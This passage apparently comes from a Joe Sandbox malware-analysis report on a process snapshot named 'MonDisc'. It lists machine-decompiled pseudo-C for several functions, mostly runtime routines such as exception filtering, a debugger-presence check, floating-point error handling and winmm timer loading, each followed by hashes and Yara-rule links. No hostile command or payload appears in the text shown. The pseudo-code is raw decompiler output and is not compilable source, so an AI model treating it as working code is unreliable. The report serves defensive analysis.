				_t25 = _t96 - 4; // -1
				r8d = _t25;
				_t47 = E00007FF67FF62C8FEEA0(_t76, _t96);
				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
				if (( *(_t108 + 0x91) & 0x00000004) == 0) goto 0x2c8ffb23;
				_t100 = _t127 - _t112 - 0x68 >> 2;
				r15d = E00007FF67FF62C917CA0(_t47, _t112, _t100);
				if (_t127 -  *((intOrPtr*)(_t80 + 0x60)) <= 0) goto 0x2c8ffaff;
				if (_t61 - 1 -  *((intOrPtr*)(_t112 + 0xc)) >= 0) goto 0x2c8ffaff;
				if (r15d == E00007FF67FF62C917CA0(_t48, _t112, _t100)) goto 0x2c8ffb1a;
				r8d = r15d;
				E00007FF67FF62C8FEEA0(_t76, _t100);
				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
				r15d =  *(_t115 + 0x68);
				if (( *(_t108 + 0x91) & 0x00000002) == 0) goto 0x2c8ffb4a;
				if (( *(_t127 - 4) & 0x000000ff) - 0x49 - 3 > 0) goto 0x2c8ffb4a;
				_t40 = _t100 - 2; // -1
				r8d = _t40;
				E00007FF67FF62C8FEEA0(_t76, _t100);
				E00007FF67FF62C984D84(0xffffffff);
				 *0xffffffff =  *((intOrPtr*)(_t115 + 0x60));
				goto ( *0x2c9ee048);
			}






















                              0x7ff62c8ff9d0
                              0x7ff62c8ff9e0
                              0x7ff62c8ff9e4
                              0x7ff62c8ff9e7
                              0x7ff62c8ff9ea
                              0x7ff62c8ff9ef
                              0x7ff62c8ff9f1
                              0x7ff62c8ff9f5
                              0x7ff62c8ff9fb
                              0x7ff62c8ffa06
                              0x7ff62c8ffa09
                              0x7ff62c8ffa0d
                              0x7ff62c8ffa11
                              0x7ff62c8ffa2a
                              0x7ff62c8ffa32
                              0x7ff62c8ffa36
                              0x7ff62c8ffa46
                              0x7ff62c8ffa49
                              0x7ff62c8ffa54
                              0x7ff62c8ffa58
                              0x7ff62c8ffa66
                              0x7ff62c8ffa68
                              0x7ff62c8ffa6c
                              0x7ff62c8ffa73
                              0x7ff62c8ffa7f
                              0x7ff62c8ffa88
                              0x7ff62c8ffa98
                              0x7ff62c8ffa9e
                              0x7ff62c8ffa9e
                              0x7ff62c8ffaa2
                              0x7ff62c8ffaae
                              0x7ff62c8ffab9
                              0x7ff62c8ffacf
                              0x7ff62c8ffae3
                              0x7ff62c8ffae9
                              0x7ff62c8ffaee
                              0x7ff62c8ffafd
                              0x7ff62c8ffaff
                              0x7ff62c8ffb0a
                              0x7ff62c8ffb16
                              0x7ff62c8ffb1a
                              0x7ff62c8ffb2a
                              0x7ff62c8ffb37
                              0x7ff62c8ffb41
                              0x7ff62c8ffb41
                              0x7ff62c8ffb45
                              0x7ff62c8ffb4a
                              0x7ff62c8ffb52
                              0x7ff62c8ffb68

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 1e88a95ae72165909cbe2a78a41288e8e4d42e1eb89ec66dd3c316d2e71af9c1
                              • Instruction ID: fed680bc6d98efa644f72a765e670f73a94de62a152064d131b7f9099c5d4c0e
                              • Opcode Fuzzy Hash: 1e88a95ae72165909cbe2a78a41288e8e4d42e1eb89ec66dd3c316d2e71af9c1
                              • Instruction Fuzzy Hash: B841D472B086818ADB21DF26D8043AD77A1FB44BA8F644631DE6D8B396CE3DE445C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B3D0 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: ff069bac779bcdd314a1f66d279dc8f486c6733c5a44f78111e97c40d74c3f9d
                              • Instruction ID: 6eec3f697eac2d33f89e608175898869f474df42c4f493bd19a3b237c20174c0
                              • Opcode Fuzzy Hash: ff069bac779bcdd314a1f66d279dc8f486c6733c5a44f78111e97c40d74c3f9d
                              • Instruction Fuzzy Hash: 6FE0C226A0AE8182EE68DB1AE8503A97AA5BB9CB98F5C8131CA8D47715DF3DC0558700
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00007FF62C8F8F3E Relevance: 19.9, APIs: 13, Instructions: 390windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExtraIconicInfoLengthMessageParentTextWindow
                              • String ID:
                              • API String ID: 2293158828-0
                              • Opcode ID: 58704173757dc4f331a19e9cb3568275fbcde7f231e9f3382646aca2a6a34e48
                              • Instruction ID: c33a6b17873442fdfbbb66c89c3674a15da607b268fc6719d69d1d8e26e391df
                              • Opcode Fuzzy Hash: 58704173757dc4f331a19e9cb3568275fbcde7f231e9f3382646aca2a6a34e48
                              • Instruction Fuzzy Hash: 5CE17A56E289034AFF446F34AC6A2BA29D57F213B4F94863AD419D22D7EE3CF149C103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9C5754 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                              Download Yara Rule
                              C-Code - Quality: 65%
                              			E00007FF67FF62C9C5754(void* __ecx, intOrPtr __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				void* _t38;
				int _t43;
				signed long long _t65;
				long long _t68;
				_Unknown_base(*)()* _t89;
				void* _t93;
				void* _t94;
				void* _t96;
				signed long long _t97;
				struct _EXCEPTION_POINTERS* _t103;

				 *((long long*)(_t96 + 0x10)) = __rbx;
				 *((long long*)(_t96 + 0x18)) = __rsi;
				_t94 = _t96 - 0x4f0;
				_t97 = _t96 - 0x5f0;
				_t65 =  *0x2ca361d8; // 0x9df21b6e58a1
				 *(_t94 + 0x4e0) = _t65 ^ _t97;
				if (__ecx == 0xffffffff) goto 0x2c9c5793;
				_t37 = E00007FF67FF62C974564(_t36);
				r8d = 0x98;
				_t38 = E00007FF67FF62C974DE0(_t37, 0, _t97 + 0x70, __r8);
				r8d = 0x4d0;
				E00007FF67FF62C974DE0(_t38, 0, _t94 + 0x10, __r8);
				 *((long long*)(_t97 + 0x48)) = _t97 + 0x70;
				_t68 = _t94 + 0x10;
				 *((long long*)(_t97 + 0x50)) = _t68;
				 *0x2c9ee050();
				r8d = 0;
				 *0x2c9ee058();
				if (_t68 == 0) goto 0x2c9c5826;
				 *(_t97 + 0x38) =  *(_t97 + 0x38) & 0x00000000;
				 *((long long*)(_t97 + 0x30)) = _t97 + 0x58;
				 *((long long*)(_t97 + 0x28)) = _t97 + 0x60;
				 *((long long*)(_t97 + 0x20)) = _t94 + 0x10;
				 *0x2c9ee070();
				 *((long long*)(_t94 + 0x108)) =  *((intOrPtr*)(_t94 + 0x508));
				 *((intOrPtr*)(_t97 + 0x70)) = __edx;
				 *((long long*)(_t94 + 0xa8)) = _t94 + 0x510;
				 *((long long*)(_t94 - 0x80)) =  *((intOrPtr*)(_t94 + 0x508));
				 *((intOrPtr*)(_t97 + 0x74)) = r8d;
				_t43 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t89, _t93);
				if (UnhandledExceptionFilter(_t103) != 0) goto 0x2c9c5888;
				if (_t43 != 0) goto 0x2c9c5888;
				if (__ecx == 0xffffffff) goto 0x2c9c5888;
				return E00007FF67FF62C973DE0(E00007FF67FF62C974564(_t45), __ecx,  *(_t94 + 0x4e0) ^ _t97);
			}















                              0x7ff62c9c5754
                              0x7ff62c9c5759
                              0x7ff62c9c5762
                              0x7ff62c9c576a
                              0x7ff62c9c5771
                              0x7ff62c9c577b
                              0x7ff62c9c578c
                              0x7ff62c9c578e
                              0x7ff62c9c579a
                              0x7ff62c9c57a0
                              0x7ff62c9c57ab
                              0x7ff62c9c57b1
                              0x7ff62c9c57bb
                              0x7ff62c9c57c4
                              0x7ff62c9c57c8
                              0x7ff62c9c57cd
                              0x7ff62c9c57e2
                              0x7ff62c9c57e5
                              0x7ff62c9c57ee
                              0x7ff62c9c57f0
                              0x7ff62c9c5803
                              0x7ff62c9c5810
                              0x7ff62c9c5819
                              0x7ff62c9c5820
                              0x7ff62c9c582d
                              0x7ff62c9c583f
                              0x7ff62c9c5843
                              0x7ff62c9c5851
                              0x7ff62c9c5855
                              0x7ff62c9c5859
                              0x7ff62c9c5863
                              0x7ff62c9c5876
                              0x7ff62c9c587a
                              0x7ff62c9c587f
                              0x7ff62c9c58ae

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: ddcf15c5e430d97c0c433eb2608b268b4dbf50b5775fd127252f593d01f75e48
                              • Instruction ID: a85af02937bf0e691d28e44ece3deadd2d20ef7f431e8afe5bb5552d12722cbe
                              • Opcode Fuzzy Hash: ddcf15c5e430d97c0c433eb2608b268b4dbf50b5775fd127252f593d01f75e48
                              • Instruction Fuzzy Hash: 12317636A08B81C6DB60CF25EC402AD73A4FB89764F540536EA8D87B9ADF3CD145CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9165F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134libraryloadersynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AddressCriticalProcSection$CreateDeleteInitializeLibraryLoadObjectSingleThreadWait
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 3275198946-184456188
                              • Opcode ID: 2e27b2875d66b769ba64ba660a062e27fc3d085249fb0a606fc32e7d451a4fae
                              • Instruction ID: bc2af7870976c3b3e8e218e2c7109714bed4bf49ed85cade7c8f7c33d0b15201
                              • Opcode Fuzzy Hash: 2e27b2875d66b769ba64ba660a062e27fc3d085249fb0a606fc32e7d451a4fae
                              • Instruction Fuzzy Hash: C1612231E1CB8286EF108B19BC615B977A8FB44BA4F580439C99D876AADF7CE055C702
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9169F0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 44libraryloaderthreadCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                              • API String ID: 4260375681-184456188
                              • Opcode ID: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction ID: a52ea1e514fdf5798c5246d31c1803ddc23d7c4b2a8195aab2c7cd51a7936b3d
                              • Opcode Fuzzy Hash: b633c80ecc07e22be945b0d230a5f9c6b3a5a3e41201ca62d3f1db35ac4fbc3e
                              • Instruction Fuzzy Hash: 7D111322E0AB4682EF14CF28A84436933E5FB48B69F544439C94EC6269EF7DE588C301
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B4798 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$cosh
                              • API String ID: 1156100317-3800341493
                              • Opcode ID: 1d76b8af4efe523374b9bfc9b946712f01b33a98e4824ca67bba6a7e8418b0cb
                              • Instruction ID: e8188a516cd026b0092ab483db3e5b79355a33a4c1e902b428427e417a704a14
                              • Opcode Fuzzy Hash: 1d76b8af4efe523374b9bfc9b946712f01b33a98e4824ca67bba6a7e8418b0cb
                              • Instruction Fuzzy Hash: 88818E21D28F8588DA63CB34B8513767358AF673E5F519333E58E71A62DF6CA1834701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D1614 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                              Download Yara Rule
                              C-Code - Quality: 44%
                              			E00007FF67FF62C9D1614(signed int __ecx, void* __rax, long long __rbx, signed long long __rcx, void* __rdx, signed int __r8) {
				void* _t31;
				signed short _t32;
				unsigned int _t35;
				unsigned int _t36;
				void* _t53;
				unsigned int _t54;
				void* _t57;
				signed int _t69;
				signed int _t70;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t79;
				signed int _t82;
				signed long long _t87;
				signed long long _t92;
				void* _t104;
				void* _t105;
				void* _t111;
				void* _t113;
				void* _t115;

				_t92 = __rcx;
				 *((long long*)(_t104 + 0x10)) = __rbx;
				_t105 = _t104 - 0x30;
				r14d = 0;
				asm("movaps [esp+0x20], xmm6");
				r15d = __ecx;
				_t2 = _t113 + 0x10; // 0x10
				r13d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x2c9d165d;
				if (r12b >= 0) goto 0x2c9d165d;
				E00007FF67FF62C9D0F1C(__rax, __rcx);
				goto 0x2c9d183f;
				_t69 = 0x00000004 & r15b;
				if (_t69 == 0) goto 0x2c9d167b;
				asm("dec ecx");
				if (_t69 >= 0) goto 0x2c9d167b;
				E00007FF67FF62C9D0F1C(__rax, _t92);
				goto 0x2c9d183f;
				_t70 = sil & r15b;
				if (_t70 == 0) goto 0x2c9d173e;
				asm("dec ecx");
				if (_t70 >= 0) goto 0x2c9d173e;
				_t31 = E00007FF67FF62C9D0F1C(__rax, _t92);
				_t87 = __r8 & _t92;
				if (_t70 == 0) goto 0x2c9d1709;
				if (_t87 == 0x2000) goto 0x2c9d16f0;
				if (_t87 == 0x4000) goto 0x2c9d16d7;
				_t73 = _t87 - _t92;
				if (_t73 != 0) goto 0x2c9d1736;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b95]");
				asm("movsd xmm0, [0x4b2d5]");
				if (_t73 > 0) goto 0x2c9d1731;
				goto 0x2c9d172a;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b7c]");
				if (_t73 > 0) goto 0x2c9d1718;
				asm("movsd xmm0, [0x4b2ba]");
				goto 0x2c9d172a;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b63]");
				if (_t73 <= 0) goto 0x2c9d1722;
				asm("movsd xmm0, [0x4b2a1]");
				goto 0x2c9d1731;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x43b4a]");
				if (_t73 <= 0) goto 0x2c9d1722;
				asm("movsd xmm0, [0x4b278]");
				goto 0x2c9d1731;
				asm("movsd xmm0, [0x4b26e]");
				asm("xorps xmm0, [0x39f9f]");
				asm("movsd [ebp], xmm0");
				goto 0x2c9d183f;
				_t74 = r15b & 0x00000002;
				if (_t74 == 0) goto 0x2c9d183f;
				asm("dec ecx");
				if (_t74 >= 0) goto 0x2c9d183f;
				asm("movsd xmm0, [edx]");
				asm("xorps xmm6, xmm6");
				asm("ucomisd xmm0, xmm6");
				if (_t74 != 0) goto 0x2c9d1771;
				if (_t74 != 0) goto 0x2c9d1771;
				goto 0x2c9d1830;
				_t32 = E00007FF67FF62C9D1D3C(_t31, 0x6000, _t57, _t74, _t105 + 0x70, _t115, _t113, _t111);
				_t53 =  *((intOrPtr*)(_t105 + 0x70)) + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t75 = _t53 - 0xfffffbce;
				if (_t75 >= 0) goto 0x2c9d17a1;
				asm("mulsd xmm0, xmm6");
				goto 0x2c9d182b;
				r8d = r14d;
				asm("comisd xmm6, xmm0");
				r8b = _t75 > 0;
				 *(_t105 + 0x8e) = _t32 & 0x0000000f | r13w;
				if (_t53 - 0xfffffc03 >= 0) goto 0x2c9d1816;
				_t35 =  *(_t105 + 0x88);
				_t54 =  *(_t105 + 0x8c);
				if ((sil & _t35) == 0) goto 0x2c9d17ef;
				_t65 =  ==  ? 1 : 1;
				_t36 = _t35 >> 1;
				 *(_t105 + 0x88) = _t36;
				_t79 = sil & _t54;
				if (_t79 == 0) goto 0x2c9d1808;
				asm("bts eax, 0x1f");
				 *(_t105 + 0x88) = _t36;
				if (_t79 != 0) goto 0x2c9d17e5;
				 *(_t105 + 0x8c) = _t54 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (r8d == 0) goto 0x2c9d182b;
				asm("xorps xmm0, [0x39ea5]");
				asm("movsd [ebp], xmm0");
				_t81 =  ==  ? 1 : 1;
				if (( ==  ? 1 : 1) == 0) goto 0x2c9d183c;
				E00007FF67FF62C9D0F1C( *(_t105 + 0x88) >> 0x30, _t111);
				_t82 = r13b & r15b;
				if (_t82 == 0) goto 0x2c9d1858;
				asm("dec ecx");
				if (_t82 >= 0) goto 0x2c9d1858;
				E00007FF67FF62C9D0F1C( *(_t105 + 0x88) >> 0x30, _t111);
				asm("movaps xmm6, [esp+0x20]");
				r14b = (__ecx & 0) == 0;
				return r14d;
			}
























                              0x7ff62c9d1614
                              0x7ff62c9d1614
                              0x7ff62c9d1624
                              0x7ff62c9d1628
                              0x7ff62c9d162b
                              0x7ff62c9d163b
                              0x7ff62c9d163e
                              0x7ff62c9d163e
                              0x7ff62c9d1645
                              0x7ff62c9d164a
                              0x7ff62c9d1650
                              0x7ff62c9d1658
                              0x7ff62c9d1662
                              0x7ff62c9d1665
                              0x7ff62c9d1667
                              0x7ff62c9d166c
                              0x7ff62c9d166e
                              0x7ff62c9d1676
                              0x7ff62c9d1680
                              0x7ff62c9d1683
                              0x7ff62c9d1689
                              0x7ff62c9d168e
                              0x7ff62c9d1697
                              0x7ff62c9d16a4
                              0x7ff62c9d16a7
                              0x7ff62c9d16af
                              0x7ff62c9d16b7
                              0x7ff62c9d16b9
                              0x7ff62c9d16bc
                              0x7ff62c9d16be
                              0x7ff62c9d16c3
                              0x7ff62c9d16cb
                              0x7ff62c9d16d3
                              0x7ff62c9d16d5
                              0x7ff62c9d16d7
                              0x7ff62c9d16dc
                              0x7ff62c9d16e4
                              0x7ff62c9d16e6
                              0x7ff62c9d16ee
                              0x7ff62c9d16f0
                              0x7ff62c9d16f5
                              0x7ff62c9d16fd
                              0x7ff62c9d16ff
                              0x7ff62c9d1707
                              0x7ff62c9d1709
                              0x7ff62c9d170e
                              0x7ff62c9d1716
                              0x7ff62c9d1718
                              0x7ff62c9d1720
                              0x7ff62c9d1722
                              0x7ff62c9d172a
                              0x7ff62c9d1731
                              0x7ff62c9d1739
                              0x7ff62c9d173e
                              0x7ff62c9d1742
                              0x7ff62c9d1748
                              0x7ff62c9d174d
                              0x7ff62c9d1753
                              0x7ff62c9d175d
                              0x7ff62c9d1762
                              0x7ff62c9d1766
                              0x7ff62c9d1768
                              0x7ff62c9d176c
                              0x7ff62c9d1776
                              0x7ff62c9d177f
                              0x7ff62c9d1785
                              0x7ff62c9d178e
                              0x7ff62c9d1794
                              0x7ff62c9d1796
                              0x7ff62c9d179c
                              0x7ff62c9d17a9
                              0x7ff62c9d17ac
                              0x7ff62c9d17b0
                              0x7ff62c9d17c0
                              0x7ff62c9d17ce
                              0x7ff62c9d17d0
                              0x7ff62c9d17de
                              0x7ff62c9d17e8
                              0x7ff62c9d17ec
                              0x7ff62c9d17ef
                              0x7ff62c9d17f1
                              0x7ff62c9d17f8
                              0x7ff62c9d17fb
                              0x7ff62c9d17fd
                              0x7ff62c9d1801
                              0x7ff62c9d180d
                              0x7ff62c9d180f
                              0x7ff62c9d1816
                              0x7ff62c9d1822
                              0x7ff62c9d1824
                              0x7ff62c9d182b
                              0x7ff62c9d1830
                              0x7ff62c9d1832
                              0x7ff62c9d1837
                              0x7ff62c9d183f
                              0x7ff62c9d1842
                              0x7ff62c9d1844
                              0x7ff62c9d1849
                              0x7ff62c9d1850
                              0x7ff62c9d1858
                              0x7ff62c9d1864
                              0x7ff62c9d187a

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
